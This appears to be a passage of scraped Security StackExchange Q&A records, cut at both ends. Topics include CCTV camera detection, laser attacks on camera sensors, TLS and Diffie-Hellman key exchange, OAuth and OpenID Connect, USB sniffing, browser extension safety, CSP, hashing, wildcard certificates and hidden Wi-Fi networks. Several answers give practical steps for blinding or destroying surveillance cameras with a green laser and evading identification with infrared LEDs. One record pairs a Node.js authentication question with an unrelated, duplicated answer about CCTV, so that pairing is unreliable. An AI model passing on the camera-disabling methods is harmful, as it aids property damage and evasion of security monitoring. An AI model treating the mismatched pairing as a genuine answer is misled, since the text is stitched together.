CCTV systems would produce what is called a ballanced signal when on, which is a video signal that has been converted to enable it to be transmitted along 'twisted pair' cables, while the wireless (RF, or less common IR that require direct line of sight from the camera to the receiver) CCTV systems are even more apparent and would transmit higher energy radiation in their specified range (on top of compromising emanations from its internal circuitry). Now, the other part of your question - detecting, if the video/audio feed is actually being recorded - is a bit more tricky to answer and would greatly depend on what system we're talking of here: Analogue recording systems (rare nowadays) would actually add a bit more latency to the EM field emanating closed-loop when switched on (producing feedback spike in sine wave oscillation), basically moving the signal termination point a bit further on the power line (or separate signal cable, if not combined). This might, or might not be detectable by your equipment. Mind you, I do mean here only the exact moment when the recording device is switched on or off, and you would have a lot harder time detecting which state it's on, if it's in continuous mode of operation. Knowing the system beforehand and actually measuring its signal levels when on/off would obviously help. Digital CCTV systems are a fair bit trickier to detect, if they're actually recording or not. In fact, you wouldn't be able to tell the difference between merely a receiver being on, or the recording system also doing its job that's connected to the receiver. With a bit of luck, you'd be dealing with direct-controllable IP cameras that would have a variable bit-rate (VBR) A/V feed encoder chip. This change in required bit-rate can be detected by better electronic bug detectors, but knowing the change in detectable EMI for the exact CCTV system beforehand would be of great help. With CBR / ABR (constant or average bit-rate) encoders, you'd most probably be out of luck though. Now, I didn't write anything about disabling them, since you're not really inquiring about that, but maybe just a quick note that it's actually getting easier the more advanced they get, and with most new ones all you need is a decent pocket/torch size green laser (532 nm) directed for a few seconds directly into their CCD / CMOS sensor. The higher their resolution, the faster they will give up , depending also on laser's Watt rating, how much light diffraction are we talking of due to lens elements arrangement, their focal point, e.t.c. On wireless systems, you could actually detect their sensor's death by observing a sudden drop in compromising emanations intensity (camera's onboard video compression would be at its best with all the images of some framerate being the same, thus lowering the wireless frequency transmissions, i.e. lowering bandwidth). Just mind, that CCTV cameras might be a whole lot more than cameras only, and pack audible and/or activity (movement / proximity / pressure change / presence of other compromising emanations / ...) detection sensors as well. And the most funny of all (to me, as I wouldn't really care of being detected or not) is being highly equipped for any eventuality, but then unwittingly manage to disturb some wildlife (bats, birds, rodents,...) with your presence, that would fright and trigger the CCTV system's response for you. | {
"source": [
"https://security.stackexchange.com/questions/37686",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/18541/"
]
} |
37,689 | I'm currently developing a web application using Node.js (server-side JavaScript) and MongoDB (NoSQL database). I'm at the stage where I have to design the authentication and I had a question about asynchronous programming. One of the advantages of using Node.js is that everything can be programmed to be asynchronous and thus non-blocking when doing I/O operations. In the case of authentication, should I write everything synchronously? I'm afraid that an attacker could spam my server with requests that would lead to the creation of duplicate accounts (or other objects) and maybe security issues later on. MongoDB doesn't support transactions like SQL. Am I right to worry about asynchronous authentication processes? | This would really depend on whether you care or not of being detected in the process and how much you're willing to invest into equipment, but sure. Provided there aren't some other, obvious signs the camera is on, such as the pan and tilt motors working Low-tech approach : This is actually really similar to how doctors test patients for involuntary reflex reaction with a light source directed in patients' eyes and observing dilation (or lack thereof) of their pupils. Most well designed CCTV cameras would have what is called an Auto Iris (AI) . Basically an automatic method of varying the size of a lens aperture, to allow the correct amount of light to fall on the imaging device. The lens would include a tiny motor and an amplifier, which are used to maintain a desired voltage video signal as produced by varying levels of light falling on its image sensor. By changing the level of light this camera's AI sensor receives, you could visually inspect the camera's iris movement even from an angle it can not record you (depending on its depth of field), or even audibly inspect the presence of such AI motor. Since these would be precision step (or stepper) motors, you would hear either a distinct buzz of it rotating, or the faint click when it's adjusted its step. Beware though, some ultra silent stepper motors have been developed already, tho I have yet to see CCTV cameras actually using them. Similar testing could be applied to other camera's components (e.g. auto-focus), with varying degree of how stealthy the tester could remain during this testing. High-tech approach : This is easy and rather obvious - electronic bug detectors are capable of detecting compromising emanations (basically EMI: RF -> microwave -> IR fields in their descending wavelength / increasing frequency). Obviously they would all have some way of telling you which direction the compromising emanations are originating from, and most also at what specific frequencies and their exact strength. Such devices are getting fairly cheap nowadays, and you can buy pretty decently capable ones off local resellers for up to a few hundred dollars, or even a second-hand one for roughly a quarter of that price off online resellers. Since the choice is fairly good, I won't give you any links to specific products, not wanting to endorse any specific manufacturer. This detection would work both for wired, as well as wireless CCTV cameras. Wired CCTV systems would produce what is called a ballanced signal when on, which is a video signal that has been converted to enable it to be transmitted along 'twisted pair' cables, while the wireless (RF, or less common IR that require direct line of sight from the camera to the receiver) CCTV systems are even more apparent and would transmit higher energy radiation in their specified range (on top of compromising emanations from its internal circuitry). Now, the other part of your question - detecting, if the video/audio feed is actually being recorded - is a bit more tricky to answer and would greatly depend on what system we're talking of here: Analogue recording systems (rare nowadays) would actually add a bit more latency to the EM field emanating closed-loop when switched on (producing feedback spike in sine wave oscillation), basically moving the signal termination point a bit further on the power line (or separate signal cable, if not combined). This might, or might not be detectable by your equipment. Mind you, I do mean here only the exact moment when the recording device is switched on or off, and you would have a lot harder time detecting which state it's on, if it's in continuous mode of operation. Knowing the system beforehand and actually measuring its signal levels when on/off would obviously help. Digital CCTV systems are a fair bit trickier to detect, if they're actually recording or not. In fact, you wouldn't be able to tell the difference between merely a receiver being on, or the recording system also doing its job that's connected to the receiver. With a bit of luck, you'd be dealing with direct-controllable IP cameras that would have a variable bit-rate (VBR) A/V feed encoder chip. This change in required bit-rate can be detected by better electronic bug detectors, but knowing the change in detectable EMI for the exact CCTV system beforehand would be of great help. With CBR / ABR (constant or average bit-rate) encoders, you'd most probably be out of luck though. Now, I didn't write anything about disabling them, since you're not really inquiring about that, but maybe just a quick note that it's actually getting easier the more advanced they get, and with most new ones all you need is a decent pocket/torch size green laser (532 nm) directed for a few seconds directly into their CCD / CMOS sensor. The higher their resolution, the faster they will give up , depending also on laser's Watt rating, how much light diffraction are we talking of due to lens elements arrangement, their focal point, e.t.c. On wireless systems, you could actually detect their sensor's death by observing a sudden drop in compromising emanations intensity (camera's onboard video compression would be at its best with all the images of some framerate being the same, thus lowering the wireless frequency transmissions, i.e. lowering bandwidth). Just mind, that CCTV cameras might be a whole lot more than cameras only, and pack audible and/or activity (movement / proximity / pressure change / presence of other compromising emanations / ...) detection sensors as well. And the most funny of all (to me, as I wouldn't really care of being detected or not) is being highly equipped for any eventuality, but then unwittingly manage to disturb some wildlife (bats, birds, rodents,...) with your presence, that would fright and trigger the CCTV system's response for you. | {
"source": [
"https://security.stackexchange.com/questions/37689",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/27389/"
]
} |
37,697 | @D3C4FF has asked a great question and I would like to follow up on that. Basically he had asked whether "[...] an attacker can identify if a CCTV camera is on/operational without direct physical access to the cable/camera [.]". I was highly impressed by @TildalWave 's answer , and particularly about disabling cameras: "[...] all you need is a decent pocket/torch size green laser (532 nm) directed for a few seconds directly into their CCD/CMOS sensor. ". I remember some 10 years ago kids in my neighborhood had found out that you could 'DoS' the street lights using the same technique (by pointing the laser to a point near the back of the light bulb). I figured out that this was because those posts light automatically when it gets dark (meaning lack of light) and as soon as it gets bright (meaning light went inside its sensors) the light would turn off. So I would like to ask: 1 - How does this laser attack apply to cameras? 2 - For which types of cameras does the laser pen attack work against (CCTV Vs. IP)? 3 - Is the laser pen attack the only vector against those devices (apart from obvious things like fire, TNT, acid, shooting, etc)? 4 - Why are cameras still vulnerable to it, if at all? 5 - Finally, how can I prevent those type of attacks against my cameras (they are all IP-based)? Just a quick edit for those who (like me) was not sure whether this question was appropriate for the site, I have posted a question on Meta . | I've experimented with this attack previously. It depends on a few variables. First, the strength in mW of the laser you are using. Second the quality of the camera you are trying to disable. 1 - How does this laser attack apply to cameras? A laser creates a super bright and focused spot on the CCD (camera sensor). This spot can be bright enough to blind the camera, or strong enough to physically damage the CCD/CMOS sensor of the camera (melting, overloading the circuitry etc). This is the type of image you'll see when a lazer is pointed at your camera: 2 - For which types of cameras does the laser pen attack work against (CCTV Vs. IP)? It doesn't matter. It will work on ALL visible light imaging technologies. This includes film cameras, CCD, CMOS sensors etc. I've tested this with 'prosumer' point and shoot cameras and a wide variety of CCTV cameras. Being IP/CCTV doesn't change the fact that your overloading the light sensing components of the imaging sensor. 3 - Is the laser pen attack the only vector against those devices (apart from obvious things like fire, TNT, acid, shooting, etc)? NO! Another clever one that i've used to success is wearable Infrared LED clothes (usually on a hat). This is essentially the same as using a bright light to obscure you from view, you will show up on the screen, but if you use bright enough LED's, it'll make you un-identifiable. 4 - Why are cameras still vulnerable to it, if at all? Because cameras sense light, if you throw enough light at them, they won't be able to process the weaker reflected ambient light. 5 - Finally, how can I prevent those type of attacks against my cameras (they are all IP-based)? You can't really. Its part of the design of the cameras. The best thing to do would be to identify cameras that may be vulnerable and perhaps install hidden cameras in the area so that if someone disables an overt camera, they'll hopefully miss the covert one. For more information on this type of attack, check this guy's site , there have been a few projects like this around but this is well written up and contains lots of good example shots. | {
"source": [
"https://security.stackexchange.com/questions/37697",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/20008/"
]
} |
37,701 | This may be a common sense question, but I am not able to find any documentation on this after searching on google for a long time When browser makes a HTTPs request, does it encrypt the data then and there, and any proxy (even on the same system) will receive the data in an encrypted form? Can that data be tampered successfully via proxy (on the same system, not on network)? If browser does the encryption/decryption, then please let me know if there is any documentation which says so. Or whether the encryption/decryption is taken care by underlying SSL protocol only at the transport level (when the request is in network). | The ‘S’ in HTTPS stands for ‘secure’ (Hypertext Transfer Protocol Secure) It is a communication protocol for secure communication that makes use of Transport Layer Security (TLS) and its predecessor, Secure Sockets Layer (SSL). TLS/SSL is initialized at layer 5 ( the session layer ) then works at layer 6 ( the presentation layer ). Most applications, like web browsers, e-mail clients or instant messaging incorporate functionality of the OSI layers 5, 6 and 7. When referring to HTTPS it will be an implementation of SSL/TLS in the context of the HTTP protocol. SSL/TLS will then be implemented in the browsers (and web server) to provide confidentiality and integrity for HTTPS traffic (actual encryption of the data). Chromium and Firefox use an API called NSS to implement SSL/TLS within their respective browser. Microsoft Windows for example has a security package called SChannel (Secure Channel) which implements SSL/TLS in order to provide authentication between clients and servers. Schannel is for example being used by Microsoft Windows clients/servers within an Active Directory environment. As for the proxy and tampering of the data it depends of the protocol you're working with. A good example to familiarize yourself in an HTTP(S) context is to have a look at Burp Proxy . | {
"source": [
"https://security.stackexchange.com/questions/37701",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/27398/"
]
} |
37,797 | From my understanding, one of the major reasons we recommend Diffie-Hellman Ephemeral (e.g. DHE or ECDHE) over non-ephemeral DH, for SSL / TLS, is that compromise of the RSA private key (i.e. private certificate) would allow an attacker to decrypt previously captured conversations. In contrast, ephemeral should prevent decryption unless the attacker is in posession of the key at the time of the conversation. How does this decryption of non-ephemeral Diffie-Hellman key exchange work in this context? Is it simply a case of observing the unencrypted primitives that are exchanged over the wire? If so, what is the point of using DH, if it provides no additional security over encrypting the key with RSA, and RSA already provides authentication of the server? | First let's be sure that we talk about the same thing. In SSL , there are "ephemeral DH cipher suites" (DHE) and "non-ephemeral DH cipher suites" (DH). With DHE, the server private key (the permanent one, the one which is stored in a file, and whose public key is in the server certificate) is of type RSA (DHE_RSA cipher suites) or DSS (DHE_DSS cipher suites), and is used only for signatures . The server generates a new random DH key pair (the private key will not be stored, which is how perfect forward secrecy is achieved: a private key cannot be stolen afterwards if it has never been stored), and sends the public key to the client, in a message which the server signs with its RSA or DSS private key. With DH cipher suites, the permanent server private key is a DH private key. The server certificate contains the DH public key. The server cannot see its RSA key be stolen because the server does not have a RSA key. The server only has a DH key. When a cipher suites is called "DH_RSA", it means "the server key is a DH key, and the server certificate was issued (i.e. signed) by a Certification Authority who uses a RSA key" . Stealing the DH private key of one party involved in a DH key exchange allows ulterior reconstruction of the shared secret, just like RSA. In "ephemeral DH", the PFS is obtained through "ephemeral", not through "DH". Technically, it would be possible to have "ephemeral RSA" but it is not done in practice(*) because generating a new RSA key pair is kinda expensive, whereas producing a new DH key pair is cheap. (*) Ephemeral RSA keys were possible with old versions of SSL as part of the "export" cipher suites, meant to comply with the pre-2000 US export regulations: the server could have a 1024-bit signature RSA key, and generate an ephemeral 512-bit RSA key pair for key exchange, used in encryption mode. I don't recall having ever seen that in the wild, though, and it is a moot point since US export regulations on key sizes were lifted. Non-ephemeral DH cipher suites exist in order to allow servers with DH certificates to operate. DH keys in certificate exist because in older times, RSA was patented but DH was not, so standardization bodies, in particular NIST, were pushing DH as the must-implement standard. Reality caught up with that, though. I have never seen a SSL server using a DH certificate. Everybody uses RSA. The RSA patent expired a decade ago anyway. | {
"source": [
"https://security.stackexchange.com/questions/37797",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/5400/"
]
} |
37,818 | I just started to use OAuth 2.0 as a way to authenticate my users. It works great - I just use the identity/profile API of each provider to get a validated email address of the user. Now I read about OpenID Connect and am a little bit confused. What is the difference between OpenID Connect and using the identity API over OAuth2? Is it just that I have a standard profile API, so that I don't have to worry whether I get an "email" or an "emails" JSON back? Or is there more to it, which makes the OpenID Connect approach more secure than my first approach? | OpenID connect will give you an access token plus an id token .
The id token is a JWT and contains information about the authenticated user. It is signed by the identity provider and can be read and verified without accessing the identity provider. In addition, OpenID connect standardizes quite a couple things that oauth2 leaves up to choice. for instance scopes, endpoint discovery, and dynamic registration of clients. This makes it easier to write code that lets the user choose between multiple identity providers. | {
"source": [
"https://security.stackexchange.com/questions/37818",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/5203/"
]
} |
37,887 | As far as I can tell, an SSL certificate for *.example.com is good for foo.example.com and bar.example.com , but not foo.bar.example.com . Wildcards certificates cannot have *.*.example.com as their subject. I guess this is due to the fact that certificates like example.* aren't allowed -- allowing characters before the wildcard can lead to a malicious user matching their certificate with the wrong domain. However, I don't see any problem with allowing certificates of the *.example.com variety to apply to all subdomains, including sub-subdomains to an infinite depth. I don't see any use case where the subdomains of a site are "trusted" but the sub-subdomains are not. This probably causes many problems. As far as I can tell, there's no way to cleanly get certificates for all sub-subdomains; you either become a CA, or you buy certificates for each subdomain. What's the reasoning, if any, behind restricting *.example.com to single-depth subdomains only? Bonus question: Similarly, is there a reason behind the blanket ban on characters before a wildcard? After all, if you allow only dots and asterisks before a wildcard, there's no way that the site from a different domain can be spoofed. | Technically, usage of wildcards is defined in RFC 2818 , which does allow names like " *.*.example.com " or " foo.*.bar.*.example.com " or even " *.*.* ". However, between theory and practice, there can be, let's say, practical differences (theory and practice match perfectly only in theory, not in practice). Web browsers have implemented stricter rules, because: Implementing multi-level wildcard matching takes a good five minutes more than implementing matching of names with a single wildcard. Browser vendors did not trust existing CA for never issuing an " *.*.com " certificate. Developers are human beings, thus very good at not seeing what they cannot imagine, so multi-wildcard names were not implemented by people who did not realize that they were possible. So Web browsers will apply restrictions, which RFC 6125 tries to at least document. Most RFC are pragmatist: if reality does not match specification, amend the specification, not reality. Note that browsers will also enforce extra rules, like forbidding " *.co.uk " (not all browsers use the same rules, though, and they are not documented either). Professional CA also enter the dance with their own constraints, such as identity checking tests before issuing certificates, or simply unwillingness to issue too broad wildcard certificates: the core business of a professional CA is to sell many certificates, and wildcard certificates don't help for that. Quite the opposite, in fact. People want to buy wildcard certificates precisely to avoid buying many individual certificates. Another theory which failed to make it into practice is Name Constraints . With this X.509 extension, it would be possible for a CA to issue a certificate to a sub-CA, restricting that sub-CA so that it may issue server certificates only in a given domain tree. A Name Constraints extension with an "explicit subtree" of value " .example.com " would allow www.example.com and foo.bar.example.com . In that model, the owner of the example.com domain would run his own CA, restricted by its über-CA to only names in the example.com subtree. That would be fine and dandy. Unfortunately, anything you do with X.509 certificates is completely worthless if deployed implementations (i.e. Web browsers) don't support it, and existing browsers don't support name constraints. They don't, because there is no certificate with name constraints to process (so that would be useless code), and there is no such certificate because Web browsers would not be able to process them anyway. To bootstrap things, someone must start the cycle, but browser vendors wait after professional CA, and professional CA are unwilling to support name constraints, for the same reasons as previously (which all come down to money, in the long run). | {
"source": [
"https://security.stackexchange.com/questions/37887",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7497/"
]
} |
37,927 | Is it possible for a (malicious) (hardware) USB device to access all the data that is transferred through the USB bus and then read/store this information, essentially sniffing all transferred data? Or is the USB bus switched and only sends data to the correct recipient, i.e. only allowing the intended recipient to read it? | Most likely yes, but it depends Much like PATA, SCSI, and Ethernet devices, USB devices don't directly connect to the computer. They connect to a Host Controller that manages all signaling and communication. All ports are connected to something called a Root Hub, and to each Root Hub you may connect other hubs and subsequently more hubs. Each of these hubs have multiple downstreams and exactly one upstream. "What does that mean?" you ask. Well, it means that whatever data sent by the hub is sent to all child hubs and devices, while data sent by the hubs and devices are only sent "upwards" to Root Hub. So, if a number of devices are connected to ports that lead to the same Root Hub (they're all controlled by the same Host Controller), then any of the devices can sniff the data only in the direction Computer -> Device. In my laptop, for example, the ports on the right side are controlled by a Host Controller, and the ports on the left side are controlled by another Host Controller. Meaning that data sent to any device on the right side can be sniffed by any device on the right side, but not devices connected to the left side. I remember a colleague of mine modifying a USB stick to prevent it from ignoring data sent to other devices. So if you plug that modified USB stick to a computer, you can capture all the files copied to other USB sticks on the same computer. Update: @Polynomial's comment made me question the whole answer, since my information is based on my colleague's description. To be sure, I tried to find some reference. I dug in the USB specs and I found this: ...
In the downstream direction, hubs operate in a broadcast mode. When a
hub detects the start of a packet on its upstream facing port, it
establishes connectivity to all enabled downstream facing ports. If a
port is not enabled, it does not propagate packet signaling downstream. Also, a TOTAL PHASE KB article seems to agree USB 2.0 works through a unidirectional broadcast system. When a host
sends a packet, all downstream devices will see that traffic. If the
host wishes to communicate with a specific device, it must include the
address of the device in the token packet. Upstream traffic (the
response from devices) are only seen by the host or hubs that are
directly on the return path to the host. | {
"source": [
"https://security.stackexchange.com/questions/37927",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/12675/"
]
} |
38,001 | How can Content Security Policy (CSP) significantly reduce the risk and impact of XSS attacks in modern browsers? Is it possible to circumvent CSP in order to execute XSS? | Yes, CSP goes a long way to defending against XSS. If you do a Google search on "Content Security Policy XSS" the first few links explain how and why. If you're having trouble using Google, here are some good links to help explain how CSP defends against XSS: An Introduction to Content Security Policy from Mike West An Introduction to Content Security Policy from David Müller Using Content Security Policy to Prevent Cross-Site Scripting (XSS) - SendSafely.com explains how they use CSP on their site. The promises of Content Security Policy to secure the web The CSP policy is enforced by the browser. Therefore, assuming you have set a proper CSP policy, and assuming your browser doesn't have bugs, there is no way to bypass CSP. That's one of the attractions of CSP. Note that some browsers (e.g., IE10 and earlier versions of IE, if I recall correctly) don't support CSP. Be warned that CSP is not a silver bullet: CSP does not stop DOM-based XSS (also known as client-side XSS) if you enable 'unsafe-eval' in your CSP policy. To prevent DOM-based XSS, you must write your Javascript carefully to avoid introducing such vulnerabilities. CSP stops most forms of script injection, but it does not stop markup injection: see, e.g., Postcards from the post-XSS world as well as the HTML form injection attack from Section III-A of Self-Exfiltration: The Dangers of Browser-Enforced Information Flow Control (Chen et al, W2SP 2012). So, you still will want to avoid introducing injection bugs into your code. See also A few things beyond the scope of Content Security Policy for more discussion of some problems that CSP doesn't solve. | {
"source": [
"https://security.stackexchange.com/questions/38001",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/11801/"
]
} |
38,033 | Almost any browser addon/extension that I install on my Chrome or Firefox (be it Firebug, RESTClient, ...) warns me, saying: It [the add-on] can: Access your data on all website Access your tabs and browsing activity Now, practically speaking, I have no time (or the skill) to read through their source-code and verify absence of malware (such as one placed in by its original author). Given this, can I safely assume these add-ons won't violate my privacy because they are coming from standard/well-known and thus implicitly trusted places, such as the Chrome Web Store , the Firefox add-on site , Opera's add-on site , Safari's extension gallery , or the EFF site . Even an add-on like HTTPS Everywhere , which you install to maintain privacy and prevent MiTM attacks, warns similarly. Is there any way to quickly tell what add-on to install and what not to, without having to read their source code? | You cannot assume that an add-on is safe "because it's hosted in one of the official extension galleries". In this answer, I start with the explanation of how extensions end up in the extension galleries for the popular browsers. At the end, I dedicate an extra section to Chrome. How does an item get listed in the official stores? Anyone with Google Wallet can pay 5$ to upload up to 20 extensions/apps to the Chrome Web Store . Extensions with binary components ( NPAPI ) are always reviewed manually. Other extensions are only checked by Google's secret scanner , which may put an extension on hold ( "Pending review" ) if needed. This scanner is not perfect: Two months ago, I found many malicious extensions that violate the Developer Program policies . (I've filed some Report abuse forms; some apps were taken down, others weren't even though they contained the same kind of adware). All Firefox add-ons on AMO are put in a review queue upon submission. All editors who review add-ons have to follow the guidelines as stated in Performing a review . Extension developers are supposed to follow these instructions . Safari extensions can be submitted to the Apple Extension gallery . Developers have to adhere to the requirements of this document pdf . After passing the review, the extension will be listed in the gallery. Apple does not host the extension files themselves. After passing review, the extension will receive a prominent location in the relatively quiet extension gallery. Upon click, the extension from an external location is immediately installed without confirmation. As of Safari 9 , extensions can choose to host the extension data in the extension gallery if they wish. All extensions in Opera's extension gallery are manually reviewed. Extensions will only be listed if they pass review ( acceptance criteria ). Extensions and add-ons on IEGallery.com are manually reviewed. The review criteria are very vague though. Further, IE extensions are compiled code, so the reviewers can't even know for sure that the add-on is safe. Auto-updating All of these four galleries support automatic updates of extensions. Unless stated otherwise, the updates will automatically be installed (unless turned off by the user). Updates to Chrome extensions are automatically checked, sometimes followed by a manual review. When an extension requests more permissions, they're automatically disabled until a user confirms the new requirements. The developer documentation provides list of permission warnings and their meanings . Google has also created a page (with fewer details) to explain the warnings to users - see Permissions requested by apps and extensions . Updates to Firefox add-ons are manually reviewed. Updates to Opera extensions are manually reviewed. Opera abandoned their old extension ecosystem and switched to a Chromium-like extension API in Opera 15. Before Opera 15 (Opera 12.xx and earlier), updates were automatically installed. Starting from Opera 15, extensions are disabled when a new permission is added, just like Chromium (see this comment on Github ). Safari extensions hosted in the extension gallery itself are probably checked by Apple 1 , (updates to) Safari extensions hosted elsewhere are not. As of Safari 9, extensions can only be auto-updated if they are hosted in Apple's extension gallery. Internet Explorer extensions are not automatically updated, unless the developer has built this feature. External code Reviews are useless if vendors allow the use of external JavaScript code. So, which galleries allows the use of external code? Chrome extensions may contain external code. Firefox and Opera forbids the use of external JavaScript code in add-ons. Safari extensions are hosted on servers not controlled by Apple, so the developer is free to include whatever they want. Internet Explorer extensions are generally closed-source compiled binaries, so developers can run whatever code they want. Privacy Many extensions collect usage statistics without the user's consent. Chrome even offers a tutorial on setting up tracking in extensions ... Chrome Firefox and Opera are doing quite well with the security of their extension platform. I don't put as much trust in the Chrome web store, because it does not manually review all extensions. The only way to be sure that an extension is safe is to review it yourself.
For this purpose, I've created the "Chrome extension source viewer" Chrome extension . This extension allows one to view the source code of an extension in the Chrome Web Store. It ships with a code beautifier to make it more readable. The first place to look at it a file called manifest.json , because it defines the capabilities of an extension. Do you see anything suspicious? For instance, does an extension which promises to add smileys to Facebook define a content script for *://*/* (= match pattern for every page)? Don't install the extension. Look at the list of files. Do you see a file called analytics.js ? Know that you're going be tracked. This is not necessarily wrong, but it's good to know. Look in the files for _gaq.push , which is the standard way to use Google Analytics. Final note: Do not blindly trust an extension because it has a high number of users. Look through recent reviews and look for any red flags. Ignore the usual trolling comments and "1 star - does not work!" (unless there are heaps of them), and focus on comments that raise concerns about privacy or security. 1. Apple likely performs these checks, but it is unconfirmed. | {
"source": [
"https://security.stackexchange.com/questions/38033",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9375/"
]
} |
38,141 | I have read some times that hashing is a one way function, that is you can make the hash of a message, but you can't recover the original message from the hash, just check its integrity. However, if this were true, why can we decrypt MD5 hashes and get the original data? | Hashing is not encryption (it is hashing), so we do not "decrypt" MD5 hashes, since they were not "encrypted" in the first place. Hashing is one-way, but deterministic: hash twice the same value, and you get twice the same output. So cracking a MD5 hash is about trying potential inputs (passwords) until a match is found. It works well when the input is "a password which a human user came up with" because human users are awfully unimaginative when it comes to choosing passwords. | {
"source": [
"https://security.stackexchange.com/questions/38141",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/15194/"
]
} |
38,206 | I'm setting up a node.js server: https.createServer({
...
ciphers: 'ECDHE-RSA-AES128-SHA256:AES128-GCM-SHA256:RC4:HIGH:!MD5:!aNULL:!EDH',
honorCipherOrder: true
}, app).listen(443); This is a able to achieve a SSLLabs A rating, which is good. Now, it appears that all of the negotiations in the handshake simulation are performed using TLS_RSA_WITH_RC4_128_SHA . RC4 is resilient against BEAST. If we are vulnerable to BEAST we cannot get an A rating. I would like to support PFS (forward secrecy) if supported by the client. Based on my reading I "must generate some randomness" by generating Diffie-Hellman parameters and get that into my certs somehow, before the server will properly implement ECDHE for forward secrecy. I read somewhere that ECDHE is less CPU-intensive than DHE, so that is a plus. Well, I have a lot of questions. But I will ask the first one: Why must I generate "some randomness" to append to the certificates, what purpose does it serve, and what does the command actually do? The OpenSSL page on dhparam doesn't tell me a lot about what it actually does. I have seen this answer and am looking for a more clear explanation (or at least references to relevant reading!). According to OpenSSL Ciphers it looks like ECDHE is a TLS 1.2 cipher. On Qualys' PFS page it says that ECDHE is supported by all major modern browsers, and yet I only see iOS6 in the results from my SSLLabs test connecting via TLS1.2. I guess I can take the "handshake simulation" section with a grain of salt. Another question is why SSLLabs rates with an A if I leave the HIGH entry in the cipher list: This would have the server support a connection e.g. TLS_RSA_WITH_AES_128_CBC_SHA (the report indicates as much), which is vulnerable to BEAST! Perhaps because it never tested with a "client" that reports no RC4 support. One more question: On the OpenSSL Ciphers page the list under TLS 1.2 cipher suites includes: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 ECDHE-RSA-AES128-SHA256 Does this indicate that if I do get it connecting with ECDHE that is now vulnerable to BEAST as well due to the use of CBC? E.g. I should switch this to do as Google does: ECDHE with RC4. But the Ciphers page does not include anything that looks like ECDHE-RSA-RC4-SHA. There is however a ECDHE-ECDSA-RC4-SHA. How is this different? Edit: this SO answer mentions that ECDSA is something separate from RSA. I'd like to replicate what Google's doing with the ECDHE_RSA+RC4+SHA as that seems like the perfect blend of performance and security. More notes (please tell me if I have misunderstood things, especially the statements disguised as questions): BEAST resilience is controlled through the selection of the symmetric cipher (RC4 vs AES, etc). Modes of AES not using CBC are not supported by many clients? So we should just avoid AES altogether...? PFS is may be obtained through the use of Diffie-Hellman key exchange, and only the modes that include either DHE or ECDHE satisfy this. Only OpenSSL supports perfect forward secrecy. RC4 is faster than AES. RC4 is better than AES (because of BEAST)? Another edit: Let's see... here is an indication that BEAST isn't something to be too realistically concerned about, though it negatively affects SSLLabs rating. That big "A" looks so good... Let's see... I should probably still put the RC4_128 ciphers in the beginning of the cipher chain if for no other reason that they have not been shown to be "broken", and are faster than AES generally. Anyway I've strayed far away from the original topic which is ECDHE. And how to get the DH parameters properly working with Node/Express? | The traditional RSA-based exchange in SSL is nice in that a random session key is generated and transmitted using asymmetric encryption, so only the owner of the private key can read it. This means that the conversation cannot be decrypted by anyone unless they have the certificate's private key. But if a third party saves the encrypted traffic and eventually acquires the private key, he can use that to decrypt the session key from SSL exchange, and then use that to decrypt the whole session. So that's not perfect forward secrecy. The key here to Perfect Forward Secrecy is the Diffie-Hellman key exchange . DH is a very cool algorithm for generating a shared key between two parties such that an observer who sees everything -- the whole exchange between the two parties in the clear -- cannot derive the key just from what is sent over the wire. The derived secret key is used one time, never stored, never transmitted, and can never be drived ever again by anyone. In other words, perfect forward secrecy. DH alone can't protect you because it's trivial to play man-in-the-middle as there's no identity and no authentication. So you can continue to use RSA for the authentication and just use Diffie-Hellman to generate the session key. That's DHE-RSA-* , so for example: DHE-RSA-AES128-SHA1 is a cipher spec that uses Diffie-Hellman to generate the key, RSA for authentication, AES-128 for encryption, and SHA1 for digests. But Diffie-Hellman requires some set-up parameters to begin with. These aren't secret and can be reused; plus they take several seconds to generate. But they should be "clean", generated by you so you know they're not provided by an attacker. The dhparam step generates the DH params (mostly just a single large prime number) ahead of time, which you then store for the server to use. Some recent bit of research showed that while "breaking" a DH exchange (that is, deriving the key from the traffic) is difficult, a fair amount of that difficult work can be done ahead of time simply based on the primes. This means that if the same DH primes are used everywhere, those become a "prime" target for well-funded agencies to run their calculations against. This suggests that there is some amount of increased safety to be had in generating your own primes (rather than relying on those that come with your software), and perhaps in re-generating those primes periodically. An interesting bit is that Elliptic curve Diffie–Hellman is a modified Diffie-Hellman exchange which uses Elliptic curve cryptography instead of the traditional RSA-style large primes. So while I'm not sure what parameters it may need (if any), I don't think it needs the kind you're generating. See also: What is ECDHE-RSA? SSL/TLS & Perfect Forward Secrecy With respect to BEAST The BEAST attack relies of some artifacts of the block chaining method used with AES on older versions of SSL. Newer versions of SSL do things right, so no worries there. RC4 is not a block cipher, so there is no block chaining. The BEAST attack is so absurdly difficult to pull off that its real-world implications are decidedly nonexistent. In fact, RC4 has some weaknesses of its own, especially when when abused the way the BEAST attack would have to do. So you may not actually be getting any better security. Certainly forcing TLS 1.2 would solve all your theoretical security problems, while at the same time preventing many visitors from actually connecting. Not entirely unlike using ECDHE. | {
"source": [
"https://security.stackexchange.com/questions/38206",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9786/"
]
} |
38,365 | According to something I spotted something in a set of directions for connecting to a hidden wireless network from windows 8 found here (located under Step 1 > "Troubleshoot connection problems" > "How do I connect to a hidden wireless network?"): A hidden wireless network is a wireless network that isn't broadcasting its network ID (SSID). Typically, wireless networks broadcast their name, and your PC “listens” for the name of the network that it wants to connect to. Because a hidden network doesn’t broadcast, your PC can't find it, so the network has to find your PC. For this to happen, your PC must broadcast both the name of the network it's looking for and its own name. In this situation, other PCs “listening” for networks will know the name of your PC as well as the network you’re connected to, which increases the risk of your PC being attacked. (emphasis added) I had always believed that hidden wireless networks were actually safer than normal ones, because only those who already know of the network are able to connect to it, so an attacker wouldn't be able to connect to it to listen to your traffic. Are hidden networks actually more risky, as the paragraph says, and if so, what measures can be taken to help mitigate the risk? Also, I know that there are some countries where publicly broadcasting home networks are actually illegal, and hidden networks are the only option for wireless. If broadcasting networks are safer, 